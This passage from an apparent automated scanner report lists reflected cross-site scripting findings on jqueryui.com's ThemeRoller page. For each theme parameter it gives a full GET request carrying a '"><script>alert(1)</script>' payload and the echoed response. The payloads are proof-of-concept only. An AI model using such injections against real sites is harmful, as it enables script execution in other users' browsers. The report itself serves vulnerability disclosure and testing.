fault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=754d312"><script>alert(1)</script>7ccc9c6c514&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd
...[SNIP]...

4.149. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da742"><script>alert(1)</script>727d2ffc486 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.pngda742"><script>alert(1)</script>727d2ffc486&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.pngda742"><script>alert(1)</script>727d2ffc486&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHig
...[SNIP]...

4.150. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c1d1"><script>alert(1)</script>4ed3b8831ca was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png5c1d1"><script>alert(1)</script>4ed3b8831ca&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png5c1d1"><script>alert(1)</script>4ed3b8831ca&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefaul
...[SNIP]...

4.151. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a787"><script>alert(1)</script>ae185997c75 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png4a787"><script>alert(1)</script>ae185997c75&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png4a787"><script>alert(1)</script>ae185997c75&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&ic
...[SNIP]...

4.152. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fa7d"><script>alert(1)</script>92ca4284c32 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png1fa7d"><script>alert(1)</script>92ca4284c32&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png1fa7d"><script>alert(1)</script>92ca4284c32&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcConte
...[SNIP]...

4.153. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e5de"><script>alert(1)</script>f8b2441e340 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png5e5de"><script>alert(1)</script>f8b2441e340&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png5e5de"><script>alert(1)</script>f8b2441e340&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009
...[SNIP]...

4.154. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c1e"><script>alert(1)</script>128443e0cb7 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e252c1e"><script>alert(1)</script>128443e0cb7&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e252c1e"><script>alert(1)</script>128443e0cb7&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5
...[SNIP]...

4.155. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d45be"><script>alert(1)</script>aaa5c7de17d was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbecd45be"><script>alert(1)</script>aaa5c7de17d&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbecd45be"><script>alert(1)</script>aaa5c7de17d&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextur
...[SNIP]...

4.156. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 763a4"><script>alert(1)</script>a96feca88dd was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7763a4"><script>alert(1)</script>a96feca88dd&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
da%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7763a4"><script>alert(1)</script>a96feca88dd&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefaul
...[SNIP]...

4.157. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ee2"><script>alert(1)</script>a004327990c was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e783ee2"><script>alert(1)</script>a004327990c&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
